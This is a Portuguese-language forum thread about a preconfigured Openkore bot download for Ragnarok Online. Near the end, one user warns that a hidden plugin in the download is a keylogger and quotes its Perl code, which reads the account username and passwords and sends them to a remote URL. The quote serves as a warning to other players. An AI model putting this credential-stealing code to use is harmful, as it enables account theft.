Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Openkore Funcional Após 09/02/2012 Sempre Atualizado/Scan/Thor Odin/Macro/Português

Compartilhar

Posts Recomendados

Po cara assim ... ja postei esse mesmo download ha um tempo antes de voce ... com scan e imagem mostrando

por isso digo que nao tem kl...

mas ve se nao usa uma conta recen criada pq e de se duvidar ,,,

mas ta bom ;;; belo topico ...

Link para o comentário
Compartilhar em outros sites

é do brocenter esse bot muito bom mesmo,ajuda muitos a usar o bot que para muitos é a salvação dentro do jogo diante da corrupção da LUG vendendo deus rops e por concequencia quem é rico na vida real se torna bilhonario dentro do jogo graças aos rops da LUG

Link para o comentário

Qualquer duvida pergunte,lembrando que quarta que vem o bot vai cair de novo e vocês esperem que a atualização sair eu posto aqui,toda quarta o bot cai

Ta ok ... mas posta um print nisso ai...

e tenha um pouco de decencia e agradece o mafagofo que foi de quem voce pegou o link na brocenter ...:nice:

mais uma coiza ... o tutorial ja vem com o download, dentro da pasta.

Valew... o post ta maneirinho mas diminui esse tutorial pra galera ver direito os comentarios...

Link para o comentário

Acho que o pessoal anda muito confuso em arquivos do openkore aqui,acho melhor lerem tutoriais e tentarem entender mais os arquivos do openkore

por isso que os posts ficam abertos .../

pra respondermos as duvidas ...

se não seriam apennas salas de bate papo:D

Link para o comentário

Vo tenta mais uma pergunta roda no win7?

Sim e Não...

pra rodar voce tem que ter um winXP... instalando uma maquina virtual( MVWARE) ou usando um posseidon remoto em outra maquina com winXP...

tem muita gente que disponibilita uma maquina com posseidon remoto"pago" mas e muito arriscado , pois os arquivos e informações da sua conta vao para esse posseidon remoto .. ^.^

Sim e Não...

pra rodar voce tem que ter um winXP... instalando uma maquina virtual( MVWARE) ou usando um posseidon remoto em outra maquina com winXP...

tem muita gente que disponibilita uma maquina com posseidon remoto"pago" mas e muito arriscado , pois os arquivos e informações da sua conta vao para esse posseidon remoto .. ^.^[/color]

Po vo parar de responder no topico dos outros ^.^.. sem noção ... aki nao e sala de tutorial ...

quer perguntar irai responder no meu topico ...

Link para o comentário

sou novato no forum mas queria mencionar que o arquivo do openkore da pagina esta corrompido nao consegui extrair no meu pc =/ o pearl esta ok.. tks e boa tarde a todos galera.

Se voce postar um print da sua tela com o erro talves possamos ajudar ^.^ (nao esqueça de cobrir os dados da sua conta no paint)

Link para o comentário

Aee galera esse openkore q esse baba noob postou estar com Keyloger e estar nos plugins, detalhe esta oculto!!!! o nome do plugin é "OPKBRGuard(Reconnect)"

uma dica abra a pasta de plugins vai em Ferramentas>opções de pasta> procure a opção pastas e arquivos ocultos e selecione: Mostrar pastas e arquivos ocultos. Feito isso abra um bloco de notas e arraste tanto esse plugin qnto o resto e procure isso:

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

esse eh o famoso KL e esse safaddo qnto todos os outros q postaram q eu ja baixei todos e testei ESTÃO COM KL!

CUIDADO

Aee galera esse openkore q esse baba noob postou estar com Keyloger e estar nos plugins, detalhe esta oculto!!!! o nome do plugin é "OPKBRGuard(Reconnect)"

Espero ter ajudado e salvado a todos!!! tomem muito cuidado ao baixar esses openkores prontos, vem com manual e ateh os postadorem se oferencem pra tirar dúvidas..kkk. Que piada!

MAIS UMA VEZ, FIQUEIM DE ZÓIOs ABERTOS SÃO TODO SAFADOS!

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.